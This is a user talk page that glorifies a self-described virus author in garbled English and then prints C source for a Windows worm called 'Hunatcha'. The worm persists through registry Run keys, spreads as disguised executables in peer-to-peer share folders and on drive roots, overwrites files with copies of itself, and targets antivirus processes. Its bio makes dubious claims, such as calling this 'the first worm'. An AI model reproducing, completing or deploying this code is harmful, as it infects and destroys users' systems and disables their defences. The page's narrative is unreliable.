User talk:Vxerskeeper

Branko D Tomich (undermine)
The Hunatcha worm or Global worm of April 6, 2010 was one of expert technic cp worms distributed via the Internet or example p2p shareway. It is considered the first worm and was certainly the first to gain media attention becouse ride killing any av company. It was written by a expert at CP Lab, Branko D Tomich, and launched on April 6, 2010 from Windows Xp. -- Branko D Tomic (undermine.) Born october 6, 1982 in Serbia place Belgrade to 27 lived in their village Blizna. He enthusiastically explored the worm and any Computer Virus. Like he say " I'm not a hacker I'm a expert of damage in internet security system!!!" and " MyWild Love is Virus for O.S ". He also love to explore any web page deep in nucleus place wher is critical red button for every virus author but never jump in trap hole. When start first blog attacker he get from people free host but deep love dont want crash that blog, he leave people to crash after own dead time. Pics of Blog is here Blog pics Branko D Tomich is one of first expert who is dead from serbian mind but live forever in our hearts and mind Branko D Tomic He told us " People can kill my body but never my soul and mind!!! " Branko D Tomic (luxilius/undermine) from Blizna Born october 6, 1982 he also hidde somewhere DNA for people who want reproduct the Virus ....

=
===========Hunatcha Worm============================================================ /*================================================================  Undermine's Generic Hunatcha VirWorm http://undermine.bloger.hr Your rights take full responsability of any  damage. The main reason for this virus is to show you how works, so this is why i added that variable. sorry for the mess but like i said it's mostly to explain my virus. Peoples interessed in this technic should also rewrite DATA d32, in line w32. It also change register usage, but using a more advanced technic update taskkill.

=
=====================================================*/ const char *Inf_Drives[] = {"A:","B:","C:","D:","E:","F:","G:","H:","I:","J:","K:","L:","M:","N:","O:","P:", "Q:","R:","S:","T:","U:","V:","W:","X:","Y:","Z:",0}; const char *Taskkill[] = {"av","Av","AV","defend","Defend","DEFEND","f-","F-","defense","Defense","DEFENSE", "Kaspersky","KASPERSKY","kaspersky","sophos","SOPHOS","Sophos","Scanner","SCANNER","scanner","Norton","norton", "NORTON","Security","SECURITY","security","Anti","ANTI","anti","SCAN","Scan","scan","Malware","MALWARE","malware", "Virus","VIRUS","virus","NOD32","nod32","Nod32","Zoner","ZONER","zoner","SECUR","Secur","secur","Dr.","DR.",0}; int InfectDrives(void); int InfectFiles(void); void FindDirectory(LPCSTR DirPath); void FillArray(LPCSTR Directory); char DirArray[250000][MAX_PATH]; int dircount = 0; char windir[MAX_PATH]; HKEY hKey; int APIENTRY WinMain(HINSTANCE hInstance,                    HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow) { int count; char wormpath[256]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); DWORD nRet = GetModuleFileName(hMe, wormpath, 256); HKEY hKey; strcat(windir, "\\System32\\update.exe"); CopyFile(wormpath, windir, 0); RegCreateKey (HKEY_CURRENT_USER, "Software\\undermine", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\InternetRegistry",&hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\Undermine",&hKey); RegSetValueEx (hKey, "Explorer", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); RegSetValueEx (hKey, "Hunatcha", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); RegCreateKey (HKEY_CURRENT_USER, "Software\\Kazaa\\Transfer", &hKey); RegSetValueEx (hKey, "Upload", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\My Shared Folder\\users_info.txt.exe", 0); CopyFile(wormpath, "C:\\Program Files\\KaZaa\\video sister.avi.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\gratis.mp4.exe", 0); CopyFile(wormpath, "C:\\Program Files\\LimeWire\\My Shared Folder\\info download.txt.exe", 0); CopyFile(wormpath, "C:\\Documents and Settings\\%user%\\My Documents\\Downloads\\upload.jpg.exe", 0); MessageBox (0, "Your system need to update my new world...", "Hunatcha Informer", MB_ICONINFORMATION | MB_OK); {    count = count ^ 5; } return 0; } int NeverAntiVirus(void) {	int c;	while(1) { for(c=0;Taskkill[c]!=0;c++) system((char *)&Taskkill[c]); Sleep(1000); }	return 0; } int InfectDrives(void) {	char IFile[256], NewFile[256], Autorun[256], InfFile[256]; GetSystemDirectory(IFile,sizeof(IFile)); strcat(IFile,"\\updater.exe"); int i;	while(1) { for(i = 0; Inf_Drives[i]; i++) { memset(NewFile,'\0',sizeof(NewFile)); memset(Autorun,'\0',sizeof(Autorun)); memset(InfFile,'\0',sizeof(InfFile)); strcpy(NewFile,Inf_Drives[i]); strcpy(Autorun,Inf_Drives[i]); strcat(NewFile,"\\allow.exe"); strcat(Autorun,"\\autorun.inf"); if(CopyFile(IFile,NewFile,FALSE)) { //	FILE *runfile = fopen(Autorun,"wb"); sprintf(InfFile,"[autorun]\r\nopen=allow.exe\r\naction=Open folder to view files\r\n"); //	fputs(InfFile,runfile); //	fclose(runfile); SetFileAttributes(NewFile,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); SetFileAttributes(Autorun,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_NOT_CONTENT_INDEXED); }		}		Sleep(2000); } } int InfectFiles(void) {	WIN32_FIND_DATA w32; HANDLE fHandle; char MyFile[256]; GetModuleFileName(NULL,MyFile,sizeof(MyFile)); if((fHandle = FindFirstFile("*.*",&w32))==INVALID_HANDLE_VALUE) return 1; else { if(w32.cFileName==MyFile) goto next; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL); CopyFile(MyFile,w32.cFileName,FALSE); next: while(FindNextFile(fHandle,&w32)) { if(w32.cFileName==MyFile) continue; SetFileAttributes(w32.cFileName,FILE_ATTRIBUTE_NORMAL); CopyFile(MyFile,w32.cFileName,FALSE); }		FindClose(fHandle); }	return 0; } void FindDirectory(LPCSTR DirPath) {    WIN32_FIND_DATA FindData; HANDLE hFind; char Path[MAX_PATH]; hFind = FindFirstFile(DirPath, &FindData); do    { strcpy(Path, DirPath); Path[strlen(DirPath)-1] = 0; strcat(Path, FindData.cFileName); if ((FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY || FindData.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) && (strstr(FindData.cFileName,".")==0)) {          FillArray(Path); strcat(Path,"\\*"); FindDirectory(Path); }    } while (FindNextFile(hFind,&FindData)); FindClose(hFind); } void FillArray(LPCSTR Directory) {    lstrcpy(DirArray[dircount],Directory); dircount++; } void p2p_spread(void) {	char wormpath[MAX_PATH]; GetModuleFileName(NULL, wormpath, MAX_PATH); strcat(windir, "\\System32\\update.exe"); }
 * 1) include 
 * 2) define PORT 21
 * 3) define VirSize	(2105+1)
 * 4) define LenID	(7+1)

=
===========Hunatcha Worm=========================================================